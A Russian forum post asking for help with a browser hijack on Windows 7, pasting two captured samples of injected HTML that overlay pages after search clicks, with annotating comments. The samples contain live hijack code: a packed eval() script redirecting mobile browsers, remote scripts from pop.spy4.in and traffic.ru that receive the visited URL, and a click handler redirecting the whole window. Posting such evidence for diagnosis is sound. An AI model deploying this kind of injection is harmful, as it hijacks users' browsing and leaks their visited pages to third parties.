Симптомы следующие. При поиске, к примеру, в Яндексе, почти каждая ссылка из результата поиска перехватывается и вместо ожидаемой страницы возникает либо равномерный серый фон, либо пустой серый прямоугольник наподобие всплывающего окна с единственной надписью Close [X] в правом верхнем углу этого "окна".
Исходный код страницы с серым фоном:
Код:
<!-- Review note (analysis only): this is the injected markup exactly as captured; every host, path and element id is an indicator and is kept byte for byte. Only HTML comments were added. All four external resources below are fetched over plain HTTP from third-party hosts that have nothing to do with the page the user asked for. -->
<!-- Script 1: a Dean-Edwards-style packer, eval(function(p,a,c,k,e,r){...}). Resolving the dictionary by hand (indices are base-62, empty entries stay literal) gives approximately:
       var ismobile=navigator.userAgent.match(/(acs)|(alav)|(alca)|(amoi)|...|(lg-c)|(lg-d)|(lg-g)|...|(t-mo)|...|(windows.ce)|(iemobile)|...|(Opera.Mini)|(ipad)|(iphone)/i);
       if(ismobile){document.location.href="http://mobi-go.in/l=32411c1807600b4d0355175e07545e0b3513141e"}
     i.e. a long list of mobile User-Agent tokens; a matching browser is redirected to mobi-go.in, a desktop browser falls through to the scripts below. -->
<script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('7 1=8.9.a(/(b)|(e)|(f)|(h)|(j)|(k)|(l)|(m)|(n)|(o)|(p)|(q)|(r)|(s)|(u-)|(w)|(x)|(y)|(z)|(A)|(B)|(C)|(D)|(E)|(F)|(G)|(0-c)|(0-d)|(0-g)|(H-)|(I)|(J)|(2)|(K)|(L)|(M)|(N-)|(O)|(P)|(Q-)|(R)|(S)|(T)|(U)|(V)|(W)|(X)|(Y)|(Z)|(10)|(11)|(12)|(13)|(14)|(15)|(16)|(17)|(18-)|(19-)|(1a)|(1b)|(1c-)|(1d)|(1e-)|(1f)|(1g)|(1h)|(1i)|(1j-)|(1k)|(t-1l)|(1m)|(1n-)|(1o)|(1p-)|(1q)|(1r)|(1s-v)|(1t)|(1u)|(3-)|(1v)|(1w)|(1x)|(1y)|(1z)|(4)|(4)|(5)|(5-)|(6.1A)|(6.1B)|(1C.1D)|(1E)|(1F)|(1G)|(1H)|(2)|(3)|(1I)|(1J)|(1K)|(1L)|(1M)|(1N)|(1O)|(1P.1Q)|(1R)|(1S)/i);1T(1){1U.1V.1W="1X"}',62,122,'lg|ismobile|midp|wap|winw|xda|up|var|navigator|userAgent|match|acs|||alav|alca||amoi||audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc||cmd||dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lge|maui|maxo|mits|mmef|mobi|mot|moto|mwbp|nec|newt|noki|opwv|palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany|sch|sec|send|seri|sgh|shar|sie|siem|smal|smar|sony|sph|symb|mo|teli|tim|tosh|tsm|upg1|upsi|vk|voda|w3cs|wapa|wapi|wapp|wapr|webc|browser|link|windows|ce|iemobile|mini|mmp|symbian|phone|pocket|mobile|android|pda|PPC|Series60|Opera|Mini|ipad|iphone|if|document|location|href|http://mobi-go.in/l=32411c1807600b4d0355175e07545e0b3513141e'.split('|'),0,{}));</script>
<!-- Script 2: remote script from pop.spy4.in; its body is not on this page. The functions BdZ851() (used in the click handler below) and the close handlers of the second sample are not defined anywhere in this markup, so they are presumably supplied by this script or the next one; cannot be verified from the paste. -->
<script language="javascript" type="text/javascript" src="http://pop.spy4.in/6jvejwr5fdp5e9o8o4c4ycz477muamt"></script><div class="ccs"> </div>
<!-- Script 3: second remote script from pop.spy4.in. Its query string carries what looks like a per-request id (t2078501) and the URL the user was actually navigating to (http%3A//www.etm.ru/cat/nn/5012044/), so the server is apparently told which page was hijacked. The opening tag is split across two lines in the paste; the src attribute continues on the next line. -->
<script charset="windows-1251" type="text/javascript" language="javascript" 
src="http://pop.spy4.in/638r8zt5sf16uxe18fyzo48s8ghy7e62r5pdz3138?&5nfoyntg=t2078501&8edl2sqq5hmndp=http%3A//www.etm.ru/cat/nn/5012044/&3ea68=0&2ks9r=0&38nww=0&2jdoh=0&15pwjfa79q=0&1as2vsk8yj=0&60iitz7h4d7=0&532mcuqlttsifr=0&4fuwcemt=1"></script>
<!-- Overlay: an absolutely positioned div covering 100% x 100% of the viewport, black at 30% opacity, z-index 2147483646 (the maximum 32-bit value minus one). This is the "uniform grey background" described in the post: the real page is underneath, dimmed and unclickable. -->
<div id='NBj270' style='z-index: 2147483647'><div id='l779' class="-1" style='opacity:0.3;filter:alpha(opacity=30);-moz-opacity:0.3;-khtml-opacity:0.3;background-color:#000;top:0;left:0;width:100%;height:100%;z-index:2147483646;position: absolute;'></div>
<!-- Click handler on document.body (addEventListener, with an attachEvent fallback for old IE). Native click events have no 'data' property, so the branch can only be taken for a synthetic event whose data is 'richmedia-close', presumably dispatched by one of the remote scripts when the user tries to close the overlay. When taken it calls BdZ851() (not defined here) and then navigates the TOP window to another pop.spy4.in URL, i.e. "closing" the overlay is itself a redirect. Both branches carry the same target URL. -->
<script type="text/javascript"> if ( document.addEventListener ) { (document.body || document.documentElement).addEventListener('click', function ( event ) { if ( event.data === 'richmedia-close' ) { BdZ851(); top.location.href="http://pop.spy4.in/6peybjqhb198mo7d2q9lp47jrd7y33pzp5kd19nnpfkc5sm31phoown5smv5w2u4bc8sqs4ga25ol68qt1ka1buv7ycs44wy5ua50yakmo90lh56j1hhzicjs8jyaaimrio98pvieg6m13w9egbpdh5mhf78lki67mb625kbvkkmk74p740b8frbhn68yaq6m97nyy3iwr8"; return false; } }, false ); } else { (document.body || document.documentElement).attachEvent('onclick', function ( event ) { if ( event.data === 'richmedia-close' ) { BdZ851(); top.location.href="http://pop.spy4.in/6peybjqhb198mo7d2q9lp47jrd7y33pzp5kd19nnpfkc5sm31phoown5smv5w2u4bc8sqs4ga25ol68qt1ka1buv7ycs44wy5ua50yakmo90lh56j1hhzicjs8jyaaimrio98pvieg6m13w9egbpdh5mhf78lki67mb625kbvkkmk74p740b8frbhn68yaq6m97nyy3iwr8"; return false; } } ); } </script>
<!-- Script 4: async/defer loader from handler.new.traffic.ru (fr=adzagl), again plain HTTP, injected inside the overlay container so it is removed together with it. -->
<script async defer charset="UTF-8" type="text/javascript" src="http://handler.new.traffic.ru/0rbqzy1mc70zz61tti4w17df887yf7?fr=adzagl"></script></div>
Исходный код страницы с "всплывающим окном":
Код:
<!-- Review note (analysis only): second captured variant, kept byte for byte as evidence; only HTML comments were added. The first three scripts are identical to the first sample (same packed mobile User-Agent check redirecting to mobi-go.in, same pop.spy4.in loader); only the per-request id (t66772180) and the embedded original URL (here http%3A//www.grinenergosnab.ru/tovari-detail/10-1151/) differ. The same prefix appearing on two unrelated sites suggests the content is injected on the way to the browser or by a local component rather than served by those sites; presumably, this cannot be settled from the markup alone. -->
<!-- Script 1: Dean-Edwards-style packer. Decoded by hand it is approximately
       var ismobile=navigator.userAgent.match(/(acs)|(alav)|...|(ipad)|(iphone)/i);
       if(ismobile){document.location.href="http://mobi-go.in/l=32411c1807600b4d0355175e07545e0b3513141e"} -->
<script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('7 1=8.9.a(/(b)|(e)|(f)|(h)|(j)|(k)|(l)|(m)|(n)|(o)|(p)|(q)|(r)|(s)|(u-)|(w)|(x)|(y)|(z)|(A)|(B)|(C)|(D)|(E)|(F)|(G)|(0-c)|(0-d)|(0-g)|(H-)|(I)|(J)|(2)|(K)|(L)|(M)|(N-)|(O)|(P)|(Q-)|(R)|(S)|(T)|(U)|(V)|(W)|(X)|(Y)|(Z)|(10)|(11)|(12)|(13)|(14)|(15)|(16)|(17)|(18-)|(19-)|(1a)|(1b)|(1c-)|(1d)|(1e-)|(1f)|(1g)|(1h)|(1i)|(1j-)|(1k)|(t-1l)|(1m)|(1n-)|(1o)|(1p-)|(1q)|(1r)|(1s-v)|(1t)|(1u)|(3-)|(1v)|(1w)|(1x)|(1y)|(1z)|(4)|(4)|(5)|(5-)|(6.1A)|(6.1B)|(1C.1D)|(1E)|(1F)|(1G)|(1H)|(2)|(3)|(1I)|(1J)|(1K)|(1L)|(1M)|(1N)|(1O)|(1P.1Q)|(1R)|(1S)/i);1T(1){1U.1V.1W="1X"}',62,122,'lg|ismobile|midp|wap|winw|xda|up|var|navigator|userAgent|match|acs|||alav|alca||amoi||audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc||cmd||dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lge|maui|maxo|mits|mmef|mobi|mot|moto|mwbp|nec|newt|noki|opwv|palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany|sch|sec|send|seri|sgh|shar|sie|siem|smal|smar|sony|sph|symb|mo|teli|tim|tosh|tsm|upg1|upsi|vk|voda|w3cs|wapa|wapi|wapp|wapr|webc|browser|link|windows|ce|iemobile|mini|mmp|symbian|phone|pocket|mobile|android|pda|PPC|Series60|Opera|Mini|ipad|iphone|if|document|location|href|http://mobi-go.in/l=32411c1807600b4d0355175e07545e0b3513141e'.split('|'),0,{}));</script>
<!-- Script 2: remote loader from pop.spy4.in (body not on this page). GWg401() and a970(), referenced by the close controls below, are not defined in this markup; presumably this script or the next one provides them. -->
<script language="javascript" type="text/javascript" src="http://pop.spy4.in/6jvejwr5fdp5e9o8o4c4ycz477muamt"></script><div class="ccs"> </div>
<!-- Script 3: second pop.spy4.in script with the per-request id and the originally requested URL in its query string; the opening tag continues on the next line of the paste. -->
<script charset="windows-1251" type="text/javascript" language="javascript" 
src="http://pop.spy4.in/83aw8akg7x97jvczluyg4458qtu9msy0z5fitir7o?&5hilmhw4=t66772180&5mlp9b2sbpmllp=http%3A//www.grinenergosnab.ru/tovari-detail/10-1151/&3mpkw=0&34g7z=0&46djk=0&4n8ch=0&wd5xj92z2=0&12zgpjvbdn=0&60iitz7h4d7=0&7e7uvfgk0n4hnb=0&612slzx1=1"></script>
<!-- Popup: a 468 x 80 px box centred with negative margins, z-index 2147483647 (the maximum), cursor:pointer on the whole box. This is the "empty grey rectangle with Close [X]" from the post. The top row holds a traffic.ru script (fr=adtop) on the left and the close control on the right; the bottom row is an iframe. -->
<div id='naH725' style='z-index: 2147483647'><div id='hS997' style='cursor:pointer; background:#000; position:absolute; z-index:2147483647; left:50%; top: 50%; margin-top: -40px; margin-left: -234px; width: 468px; height: 80px; position: absolute;'> <table width='468' height='80' cellspacing='0' cellpadding='0' style='border: 2px double black; background-color: #666666;'> <tr height='20'> <td width='80%' style='text-align: left;' align='left'> <style type="text/css"> span#G465 a { color: #ddd; padding: 0 0 0 4px; text-decoration: underline; font: bold 13px arial; text-transform: none; letter-spacing: normal; line-height: normal; } span#G465 a:hover { color: #fff; } div#hS997 * { padding: 0; margin: 0; } div#m301, div#m301 * { vertical-align : middle; color: #FFFFFF; text-decoration: none; font: bold 13px arial; text-transform: none; letter-spacing: normal; line-height: normal; } </style> <span id='G465'><script async defer charset="UTF-8" type="text/javascript" src="http://handler.new.traffic.ru/0qjos4diza10r89nhlhs19bkrse6tf?fr=adtop"></script></span> </td> <td width='20%' style='padding-right: 1px; text-align: right;' align='right'>
<!-- Close control: the container's onclick runs GWg401() and the Close[X] link's href runs a970(); neither is defined in this markup, so what "closing" actually does cannot be seen here (in the first sample the close path redirects the top window to pop.spy4.in). The onload attribute on the <a> element never fires, so the display='none' it sets is dead code. A further traffic.ru script (data=...) is loaded inside the same cell, with its tag again split across paste lines. -->
<div id="m301" onclick="GWg401()"> <a style="position: absolute; right: 6px; top: 4px; z-index: 1;color: #FFFFFF; text-decoration: none; font: bold 13px arial; text-transform: none; letter-spacing: normal; line-height: normal;" id="llkaookIjshjd" title="Close" href="javascript:a970()" onload="document.getElementById('llkaookIjshjd').style.display='none';">Close[X]</a> <div style="position: relative; top: 0; left: 0; z-index: 5;"> <script async defer charset="UTF-8" type="text/javascript" 
src="http://handler.new.traffic.ru/0ws6ipq91t1ahzzgcrgw13h453vhmr?data=90k6u4gfhul760hkiemqzc6p9uhxosdw589d57btzbik63p6kzgcg7r5erzqsmif6g8yabw39e1c57uy2lrl02877khwp1gmgpe8sr8vrpu24l8ybzspirb486ecljkw57ih5psaxi1oduk538y7hzx05v8p9aaqj95vu8pymt5qtq1l53y6950124y79boqlgkzru3iwr8"></script> </div> </div> <!-- <a style='color: #FFFFFF; text-decoration: none; font: bold 13px arial; text-transform: none; letter-spacing: normal; line-height: normal;' title='Close' href='javascript:a970()'>Close[X]</a> --> </td> </tr> <tr>
<!-- Ad body: a 468 x 60 iframe from pop.spy4.in/yaim.php (ad=7, t=2), plain HTTP, inside the popup. -->
<td height='60' width='468' colspan='2' bgcolor='#CCCCCC'> <iframe src='http://pop.spy4.in/yaim.php?ad=7&t=2' width='468' height='60' scrolling='no' frameborder='0'> </iframe> </td> </tr> </table> </div></div>
Замечены редиректы со ссылок как в IE8, так и в последней Opera (12.11). Чистка кэша браузеров и %TEMP% для IE точно не помогает; Opera вроде бы сутки работает без редиректов.
ОС Windows 7 Pro x64, штатный антивирус Kaspersky for Workstations 6.0.
Сканировал CureIT и Virus Removal Tool, в т.ч. в Safe mode, оба не находят ничего.
Хотелось бы узнать, что это за зверь, где висит и как вывести. Заранее спасибо!
virusinfo_syscure.zip
virusinfo_syscheck.zip
hijackthis.log